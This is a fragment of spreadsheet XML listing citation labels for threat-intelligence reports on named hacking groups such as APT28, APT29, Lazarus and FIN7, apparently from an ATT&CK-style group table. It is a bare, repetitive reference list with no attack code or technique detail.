    <t>(Citation: FireEye APT28),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Kaspersky Sofacy),(Citation: Palo Alto Sofacy 06-2018),(Citation: XAgentOSX 2017),(Citation: NSA/FBI Drovorub August 2020),(Citation: Sofacy DealersChoice),(Citation: ESET Zebrocy May 2019),(Citation: Unit42 Cannon Nov 2018),(Citation: FireEye APT28 Hospitality Aug 2017),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Fysbis Palo Alto Analysis),(Citation: Unit42 Sofacy Dec 2018),(Citation: FireEye APT28 January 2017),(Citation: Sofacy Komplex Trojan),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: Securelist Sofacy Feb 2018),(Citation: US District Court Indictment GRU Oct 2018),(Citation: ESET Sednit Part 3),(Citation: ESET LoJax Sept 2018),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Crowdstrike DNC June 2016),(Citation: Symantec APT28 Oct 2018),(Citation: FireEye APT28),(Citation: McAfee APT28 DDE2 Nov 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: McAfee APT28 DDE1 Nov 2017),(Citation: Palo Alto Sofacy 06-2018),(Citation: Palo Alto Office Test Sofacy),(Citation: Trend Micro Pawn Storm April 2017),(Citation: Talos Seduploader Oct 2017),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: XAgentOSX 2017),(Citation: RSAC 2015 Abu Dhabi Stefano Maccaglia),(Citation: Sofacy DealersChoice),(Citation: ESET Zebrocy May 2019),(Citation: TrendMicro Pawn Storm 2019),(Citation: FireEye APT28 Hospitality Aug 2017),(Citation: Unit42 Cannon Nov 2018),(Citation: Unit 42 Sofacy Feb 2018),(Citation: Unit42 Sofacy Dec 2018),(Citation: ESET Sednit Part 2),(Citation: Microsoft STRONTIUM Aug 2019),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Überwachung APT28 Forfiles June 2015),(Citation: Bitdefender APT28 Dec 2015),(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020),(Citation: Securelist Sofacy Feb 2018),(Citation: Microsoft Targeting Elections September 2020),(Citation: Trend Micro Pawn Storm OAuth 2017),(Citation: Unit 42 Playbook Dec 2017),(Citation: US District Court Indictment GRU Oct 2018),(Citation: FireEye Op RussianDoll),(Citation: ESET Sednit Part 3),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET LoJax Sept 2018),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: MS17-010 March 2017),(Citation: Google TAG Ukraine Threat Landscape March 2022),(Citation: Microsoft SIR Vol 19),(Citation: Crowdstrike DNC June 2016),(Citation: ESET Sednit Part 1),(Citation: Symantec APT28 Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: CISA WellMail July 2020),(Citation: ESET Dukes October 2019),(Citation: NCSC APT29 July 2020),(Citation: Mandiant No Easy Breach),(Citation: ESET T3 Threat Report 2021),(Citation: Microsoft 365 Defender Solorigate),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: CISA SoreFang July 2016),(Citation: F-Secure The Dukes),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: MSTIC NOBELIUM May 2021),(Citation: FireEye POSHSPY April 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: PWC WellMess C2 August 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Secureworks IRON RITUAL Profile),(Citation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: Secureworks IRON HEMLOCK Profile),(Citation: CISA WellMess July 2020),(Citation: FireEye APT29 Nov 2018),(Citation: PWC WellMess July 2020),(Citation: Symantec RAINDROP January 2021),(Citation: MSTIC FoggyWeb September 2021),(Citation: SentinelOne NobleBaron June 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Volexity PowerDuke November 2016),(Citation: MSTIC Nobelium Oct 2021),(Citation: Mandiant APT29 Trello),(Citation: ESET Dukes October 2019),(Citation: NCSC APT29 July 2020),(Citation: Mandiant No Easy Breach),(Citation: Microsoft 365 Defender Solorigate),(Citation: ESET T3 Threat Report 2021),(Citation: F-Secure The Dukes),(Citation: MSRC Nobelium June 2021),(Citation: ANSSI Nobelium Phishing December 2021),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: MSTIC NOBELIUM May 2021),(Citation: FireEye APT29),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: PWC WellMess C2 August 2020),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Microsoft Internal Solorigate Investigation Blog),(Citation: Secureworks IRON RITUAL Profile),(Citation: Secureworks IRON RITUAL USAID Phish May 2021),(Citation: Secureworks IRON HEMLOCK Profile),(Citation: Volexity SolarWinds),(Citation: FireEye APT29 Nov 2018),(Citation: FireEye APT29 Domain Fronting),(Citation: PWC WellMess July 2020),(Citation: Symantec Seaduke 2015),(Citation: MagicWeb),(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Symantec RAINDROP January 2021),(Citation: SentinelOne NobleBaron June 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: MSTIC Nobelium Oct 2021),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks),</t>
  </si>
  <si>
    <t>(Citation: FireEye Clandestine Fox Part 2),(Citation: FireEye Clandestine Wolf),(Citation: FireEye Operation Double Tap),(Citation: Symantec Buckeye),(Citation: FireEye Clandestine Fox Part 2),(Citation: FireEye Clandestine Wolf),(Citation: FireEye Operation Double Tap),(Citation: APT3 Adversary Emulation Plan),(Citation: FireEye Clandestine Fox),(Citation: evolution of pirpi),(Citation: Symantec Buckeye),(Citation: Twitter Cglyer Status Update APT3 eml),(Citation: aptsim),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT30),(Citation: FireEye APT30),</t>
  </si>
  <si>
    <t>(Citation: Volexity OceanLotus Nov 2017),(Citation: Volexity Ocean Lotus November 2020),(Citation: FireEye APT32 May 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: TrendMicro MacOS April 2018),(Citation: Cybereason Oceanlotus May 2017),(Citation: Unit 42 KerrDown February 2019),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Volexity Ocean Lotus November 2020),(Citation: Volexity OceanLotus Nov 2017),(Citation: Cybereason Cobalt Kitty 2017),(Citation: FireEye APT32 May 2017),(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn),(Citation: ESET OceanLotus macOS April 2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: ESET OceanLotus),(Citation: GitHub Invoke-Obfuscation),(Citation: ESET OceanLotus Mar 2019),(Citation: FireEye APT32 April 2020),(Citation: Amnesty Intl. Ocean Lotus February 2021),(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Holmium June 2020),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: FireEye APT33 Sept 2017),(Citation: FireEye APT33 Guardrail),(Citation: Microsoft Holmium June 2020),(Citation: Symantec Elfin Mar 2019),(Citation: FireEye APT33 Webinar Sept 2017),(Citation: FireEye APT33 Sept 2017),(Citation: FireEye APT33 Guardrail),</t>
  </si>
  <si>
    <t>(Citation: Talos NavRAT May 2018),(Citation: Unit 42 Nokki Oct 2018),(Citation: FireEye APT37 Feb 2018),(Citation: Talos Group123),(Citation: Securelist ScarCruft May 2019),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Securelist ScarCruft Jun 2016),(Citation: FireEye APT37 Feb 2018),(Citation: Talos Group123),(Citation: Securelist ScarCruft May 2019),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Volexity InkySquid RokRAT August 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018),(Citation: ESET Lazarus KillDisk April 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: FireEye APT38 Oct 2018),(Citation: Kaspersky Lazarus Under The Hood APR 2017),(Citation: ESET Lazarus KillDisk April 2018),(Citation: CISA AA20-239A BeagleBoyz August 2020),</t>
  </si>
  <si>
    <t>(Citation: Securelist Remexi Jan 2019),(Citation: Unit 42 MechaFlounder March 2019),(Citation: Dark Reading APT39 JAN 2019),(Citation: BitDefender Chafer May 2020),(Citation: FireEye APT39 Jan 2019),(Citation: FBI FLASH APT39 September 2020),(Citation: Symantec Chafer February 2018),(Citation: Symantec Chafer Dec 2015),(Citation: BitDefender Chafer May 2020),(Citation: IBM ITG07 June 2019),(Citation: FireEye APT39 Jan 2019),(Citation: FBI FLASH APT39 September 2020),(Citation: Symantec Chafer February 2018),(Citation: Symantec Chafer Dec 2015),</t>
  </si>
  <si>
    <t>(Citation: Recorded Future RedEcho Feb 2021),(Citation: Group IB APT 41 June 2021),(Citation: FireEye APT41 March 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye MESSAGETAP October 2019),(Citation: Twitter ItsReallyNick APT41 EK),(Citation: Group IB APT 41 June 2021),(Citation: FireEye APT41 March 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FireEye APT41 Aug 2019),</t>
  </si>
  <si>
    <t>(Citation: Check Point Rocket Kitten),(Citation: FireEye Operation Saffron Rose 2013),(Citation: Check Point Rocket Kitten),</t>
  </si>
  <si>
    <t>(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: IssueMakersLab Andariel GoldenAxe May 2017),(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: Kaspersky Andariel Ransomware June 2021),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021),(Citation: TrendMicro New Andariel Tactics July 2018),</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: SentinelOne Aoqin Dragon June 2022),</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: CrowdStrike AQUATIC PANDA December 2021),</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom),(Citation: Talos ZxShell Oct 2014),(Citation: Cisco Group 72),(Citation: Novetta-Axiom),(Citation: Cisco Group 72),</t>
  </si>
  <si>
    <t>(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: DBAPPSecurity BITTER zero-day Feb 2021),(Citation: Microsoft CVE-2021-1732 Feb 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),</t>
  </si>
  <si>
    <t>(Citation: Recorded Future RedEcho Feb 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Symantec Tick Apr 2016),(Citation: Trend Micro Daserf Nov 2017),(Citation: Trend Micro Tick November 2019),(Citation: Trend Micro Tick November 2019),(Citation: Symantec Tick Apr 2016),(Citation: Secureworks BRONZE BUTLER Oct 2017),</t>
  </si>
  <si>
    <t>(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),</t>
  </si>
  <si>
    <t>,(Citation: Securelist BlackOasis Oct 2017),</t>
  </si>
  <si>
    <t>(Citation: Symantec Palmerworm Sep 2020),(Citation: JPCert PLEAD Downloader June 2018),(Citation: NTT Security Flagpro new December 2021),(Citation: JPCert TSCookie March 2018),(Citation: Trend Micro Waterbear December 2019),(Citation: TrendMicro BlackTech June 2017),(Citation: IronNet BlackTech Oct 2021),(Citation: Symantec Palmerworm Sep 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: ESET PLEAD Malware July 2018),(Citation: Trend Micro Waterbear December 2019),(Citation: TrendMicro BlackTech June 2017),</t>
  </si>
  <si>
    <t>(Citation: RedCanary Mockingbird May 2020),(Citation: RedCanary Mockingbird May 2020),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Carbanak),(Citation: Group-IB Anunak),(Citation: Kaspersky Carbanak),(Citation: Forcepoint Carbanak Google C2),(Citation: Group-IB Anunak),</t>
  </si>
  <si>
    <t>(Citation: Cycraft Chimera April 2020),(Citation: NCC Group Chimera January 2021),(Citation: Cycraft Chimera April 2020),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cylance Cleaver),(Citation: Cylance Cleaver),(Citation: Dell Threat Group 2889),</t>
  </si>
  <si>
    <t>(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Proofpoint Cobalt June 2017),(Citation: RiskIQ Cobalt Nov 2017),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Group IB Cobalt Aug 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Talos Cobalt Group July 2018),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Crowdstrike Global Threat Report Feb 2018),(Citation: RiskIQ Cobalt Jan 2018),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: Proofpoint Cobalt June 2017),(Citation: RiskIQ Cobalt Nov 2017),(Citation: PTSecurity Cobalt Group Aug 2017),(Citation: Group IB Cobalt Aug 2017),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Talos Cobalt Group July 2018),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Crowdstrike Global Threat Report Feb 2018),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: RiskIQ Cobalt Jan 2018),(Citation: Morphisec Cobalt Gang Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: Uptycs Confucius APT Jan 2021),(Citation: Check Point Warzone Feb 2020),(Citation: Uptycs Confucius APT Jan 2021),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: TrendMicro Confucius APT Aug 2021),</t>
  </si>
  <si>
    <t>(Citation: ClearSky Wilted Tulip July 2017),(Citation: Microsoft POLONIUM June 2022),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ClearSky and Trend Micro Operation Wilted Tulip July 2017),(Citation: CopyKittens Nov 2015),</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Bandook Nov 2020),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Lookout Dark Caracal Jan 2018),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit 42 Playbook Dec 2017),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Unit 42 Playbook Dec 2017),(Citation: Unit 42 Phishery Aug 2018),</t>
  </si>
  <si>
    <t>(Citation: Securelist DarkVishnya Dec 2018),(Citation: Securelist DarkVishnya Dec 2018),</t>
  </si>
  <si>
    <t>,(Citation: Microsoft DUBNIUM July 2016),(Citation: Kaspersky Darkhotel),(Citation: Securelist Darkhotel Aug 2015),(Citation: Microsoft DUBNIUM June 2016),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),</t>
  </si>
  <si>
    <t>(Citation: Cylance Shell Crew Feb 2017),(Citation: Symantec Black Vine),(Citation: ThreatConnect Anthem),(Citation: Alperovitch 2014),(Citation: Symantec Black Vine),(Citation: RSA Shell Crew),(Citation: Alperovitch 2014),(Citation: CrowdStrike Deep Panda Web Shells),</t>
  </si>
  <si>
    <t>(Citation: Operation Quantum Entanglement),(Citation: New DragonOK),,</t>
  </si>
  <si>
    <t>(Citation: US-CERT TA18-074A),(Citation: Secureworks MCMD July 2019),(Citation: Secureworks Karagany July 2019),(Citation: Core Security Impacket),(Citation: Symantec Dragonfly Sept 2017),(Citation: Symantec Dragonfly),(Citation: Gigamon Berserk Bear October 2021),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: US-CERT TA18-074A),(Citation: Core Security Impacket),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Kali Hydra),(Citation: Symantec Dragonfly Sept 2017),(Citation: Gigamon Berserk Bear October 2021),(Citation: Secureworks IRON LIBERTY July 2019),</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022),(Citation: Proofpoint Bumblebee April 2022),(Citation: Google EXOTIC LILY March 2022),</t>
  </si>
  <si>
    <t>(Citation: TrendMicro EarthLusca 2022),(Citation: TrendMicro EarthLusca 2022),</t>
  </si>
  <si>
    <t>(Citation: Symantec Elderwood Sept 2012),(Citation: CSM Elderwood Sept 2012),(Citation: Symantec Elderwood Sept 2012),(Citation: Security Affairs Elderwood Sept 2012),(Citation: Symantec Ristol May 2012),</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Ember Bear Profile March 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Mandiant UNC2589 March 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),</t>
  </si>
  <si>
    <t>,(Citation: Kaspersky Gauss Whitepaper),(Citation: Kaspersky Equation QA),</t>
  </si>
  <si>
    <t>(Citation: ESET EvilNum July 2020),(Citation: Prevailion EvilNum May 2020),(Citation: ESET EvilNum July 2020),</t>
  </si>
  <si>
    <t>(Citation: FireEye FIN10 June 2017),(Citation: Github PowerShell Empire),(Citation: FireEye FIN10 June 2017),</t>
  </si>
  <si>
    <t>,(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: FireEye Hacking FIN4 Dec 2014),</t>
  </si>
  <si>
    <t>(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: DarkReading FireEye FIN5 Oct 2015),(Citation: FireEye Respond Webinar July 2017),</t>
  </si>
  <si>
    <t>(Citation: Security Intelligence More Eggs Aug 2019),(Citation: FireEye Maze May 2020),(Citation: Visa FIN6 Feb 2019),(Citation: FireEye FIN6 April 2016),(Citation: FireEye FIN6 Apr 2019),(Citation: Crowdstrike Global Threat Report Feb 2018),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Group IB GrimAgent July 2021),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Visa FIN6 Feb 2019),(Citation: FireEye FIN6 April 2016),(Citation: RiskIQ British Airways September 2018),(Citation: RiskIQ Newegg September 2018),(Citation: FireEye FIN6 Apr 2019),(Citation: Trend Micro FIN6 October 2019),</t>
  </si>
  <si>
    <t>(Citation: Trustwave Pillowmint June 2020),(Citation: FireEye FIN7 March 2017),(Citation: FireEye FIN7 Oct 2019),(Citation: FireEye FIN7 Aug 2018),(Citation: Flashpoint FIN 7 March 2019),(Citation: SecureList Griffon May 2019),(Citation: Threatpost Lizar May 2021),(Citation: DOJ FIN7 Aug 2018),(Citation: Gemini FIN7 Oct 2021),(Citation: FBI Flash FIN7 USB),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: FireEye FIN7 April 2017),(Citation: IBM Ransomware Trends September 2020),(Citation: CyberScoop FIN7 Oct 2017),(Citation: Flashpoint FIN 7 March 2019),(Citation: FireEye FIN7 Aug 2018),(Citation: FireEye FIN7 Oct 2019),(Citation: FireEye FIN7 April 2017),(Citation: Morphisec FIN7 June 2017),(Citation: FireEye FIN7 Shim Databases),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: eSentire FIN7 July 2021),(Citation: DOJ FIN7 Aug 2018),(Citation: FBI Flash FIN7 USB),(Citation: FireEye Obfuscation June 2017),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: FireEye CARBANAK June 2017),</t>
  </si>
  <si>
    <t>(Citation: Bitdefender FIN8 July 2021),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye Fin8 May 2016),(Citation: FireEye Obfuscation June 2017),(Citation: Bitdefender FIN8 July 2021),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye Fin8 May 2016),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),</t>
  </si>
  <si>
    <t>(Citation: Check Point Pay2Key November 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: ClearkSky Fox Kitten February 2020),(Citation: CrowdStrike PIONEER KITTEN August 2020),(Citation: ClearkSky Fox Kitten February 2020),(Citation: CrowdStrike PIONEER KITTEN August 2020),(Citation: Dragos PARISITE ),(Citation: ClearSky Pay2Kitten December 2020),(Citation: Check Point Pay2Key November 2020),(Citation: CISA AA20-259A Iran-Based Actor September 2020),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 PingPull Jun 2022),(Citation: Microsoft GALLIUM December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: Cybereason Soft Cell June 2019),</t>
  </si>
  <si>
    <t>,(Citation: Securelist GCMAN),</t>
  </si>
  <si>
    <t>(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: Secureworks REvil September 2019),(Citation: Anomali Static Kitten February 2021),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Tetra Defense Sodinokibi March 2020),(Citation: Secureworks GOLD SOUTHFIELD),(Citation: Secureworks REvil September 2019),</t>
  </si>
  <si>
    <t>,(Citation: Symantec Gallmaker Oct 2018),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),(Citation: Unit 42 Gamaredon February 2022),(Citation: Secureworks IRON TILDEN Profile),(Citation: Symantec Shuckworm January 2022),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Microsoft Actinium February 2022),(Citation: Unit 42 Gamaredon February 2022),(Citation: Secureworks IRON TILDEN Profile),(Citation: TrendMicro Gamaredon April 2020),(Citation: ESET Gamaredon June 2020),(Citation: Symantec Shuckworm January 2022),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Proofpoint RTF Injection),(Citation: CERT-EE Gamaredon January 2021),</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Gorgon Group Aug 2018),(Citation: Unit 42 Gorgon Group Aug 2018),</t>
  </si>
  <si>
    <t>(Citation: Citizen Lab Group5),(Citation: Citizen Lab Group5),</t>
  </si>
  <si>
    <t>(Citation: Tarrask scheduled task),(Citation: Volexity Exchange Marauder March 2021),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Tarrask scheduled task),(Citation: Volexity Exchange Marauder March 2021),(Citation: FireEye Exchange Zero Days March 2021),(Citation: Microsoft HAFNIUM March 2020),</t>
  </si>
  <si>
    <t>(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Kaspersky Lyceum October 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: SecureWorks August 2019),(Citation: Accenture Lyceum Targets November 2021),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Kaspersky APT Trends Q1 April 2021),(Citation: Kaspersky Lyceum October 2021),(Citation: ClearSky Siamesekitten August 2021),(Citation: Dragos Hexane),(Citation: SecureWorks August 2019),(Citation: Microsoft POLONIUM June 2022),</t>
  </si>
  <si>
    <t>(Citation: Malwarebytes Higaisa 2020),(Citation: PTSecurity Higaisa 2020),(Citation: Zscaler Higaisa 2020),(Citation: PTSecurity Higaisa 2020),(Citation: Malwarebytes Higaisa 2020),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Unit 42 Inception November 2018),(Citation: Symantec Inception Framework March 2018),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Unit 42 Inception November 2018),(Citation: Kaspersky Cloud Atlas December 2014),</t>
  </si>
  <si>
    <t>(Citation: Checkpoint IndigoZebra July 2021),(Citation: Securelist APT Trends Q2 2017),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Securelist APT Trends Q2 2017),(Citation: HackerNews IndigoZebra July 2021),</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike EvilCorp March 2021),(Citation: NCC Group WastedLocker June 2020),(Citation: Symantec WastedLocker June 2020),(Citation: Treasury EvilCorp Dec 2019),(Citation: Crowdstrike Indrik November 2018),(Citation: Crowdstrike Indrik November 2018),(Citation: Symantec WastedLocker June 2020),</t>
  </si>
  <si>
    <t>(Citation: APT15 Intezer June 2018),(Citation: NCC Group APT15 Alive and Strong),(Citation: Microsoft NICKEL December 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: ESET Okrum July 2019),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Microsoft NICKEL December 2021),(Citation: NCC Group APT15 Alive and Strong),</t>
  </si>
  <si>
    <t>(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Malwarebytes Kimsuky June 2021),(Citation: CISA AA20-301A Kimsuky),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: KISA Operation Muzabi),(Citation: Netscout Stolen Pencil Dec 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Zdnet Kimsuky Dec 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: CISA AA20-301A Kimsuky),(Citation: EST Kimsuky April 2019),(Citation: VirusBulletin Kimsuky October 2019),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: Zdnet Kimsuky Group September 2020),(Citation: Talos Kimsuky Nov 2021),(Citation: Securelist Kimsuky Sept 2013),(Citation: KISA Operation Muzabi),</t>
  </si>
  <si>
    <t>(Citation: MSTIC DEV-0537 Mar 2022),(Citation: MSTIC DEV-0537 Mar 2022),</t>
  </si>
  <si>
    <t>(Citation: LogRhythm WannaCry),(Citation: McAfee Lazarus Nov 2020),(Citation: McAfee GhostSecret),(Citation: Novetta Blockbuster),(Citation: US-CERT Volgmer Nov 2017),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: TrendMicro Lazarus Nov 2018),(Citation: CISA EB Aug 2020),(Citation: CISA AppleJeus Feb 2021),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Lazarus RATANKBA),(Citation: ClearSky Lazarus Aug 2020),(Citation: US-CERT HARDRAIN March 2018),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: TrendMicro macOS Dacls May 2020),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: US-CERT TYPEFRAME June 2018),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: FireEye WannaCry 2017),(Citation: SecureWorks WannaCry Analysis),(Citation: Novetta Blockbuster Loaders),(Citation: FireEye APT38 Oct 2018),(Citation: McAfee Bankshot),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: US-CERT BADCALL),(Citation: Novetta Blockbuster Destructive Malware),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: Kaspersky Dtrack),(Citation: McAfee Lazarus Nov 2020),(Citation: Qualys LolZarus),(Citation: Novetta Blockbuster RATs),(Citation: McAfee GhostSecret),(Citation: ESET Lazarus Jun 2020),(Citation: Novetta Blockbuster),(Citation: Novetta Blockbuster Tools),(Citation: US-CERT SHARPKNOT June 2018),(Citation: CISA AppleJeus Feb 2021),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: TrendMicro macOS Dacls May 2020),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Lazarus APT January 2022),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: Novetta Blockbuster Loaders),(Citation: Google TAG Lazarus Jan 2021),(Citation: McAfee Bankshot),(Citation: RATANKBA),(Citation: McAfee Lazarus Jul 2020),(Citation: Novetta Blockbuster Destructive Malware),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: MalwareBytes LazyScripter Feb 2021),</t>
  </si>
  <si>
    <t>(Citation: Symantec Leafminer July 2018),(Citation: Symantec Leafminer July 2018),</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: CISA AA21-200A APT40 July 2021),(Citation: FireEye APT40 March 2019),(Citation: Accenture MUDCARP March 2019),(Citation: Proofpoint Leviathan Oct 2017),(Citation: FireEye Periscope March 2018),(Citation: CISA AA21-200A APT40 July 2021),(Citation: FireEye APT40 March 2019),(Citation: Accenture MUDCARP March 2019),(Citation: Proofpoint Leviathan Oct 2017),</t>
  </si>
  <si>
    <t>(Citation: Spring Dragon Jun 2015),(Citation: Emissary Trojan Feb 2016),(Citation: Lotus Blossom Dec 2015),(Citation: Accenture Dragonfish Jan 2018),,</t>
  </si>
  <si>
    <t>(Citation: ESET Machete July 2019),(Citation: Securelist Machete Aug 2014),(Citation: Cylance Machete Mar 2017),(Citation: ESET Machete July 2019),(Citation: Securelist Machete Aug 2014),(Citation: 360 Machete Sep 2020),</t>
  </si>
  <si>
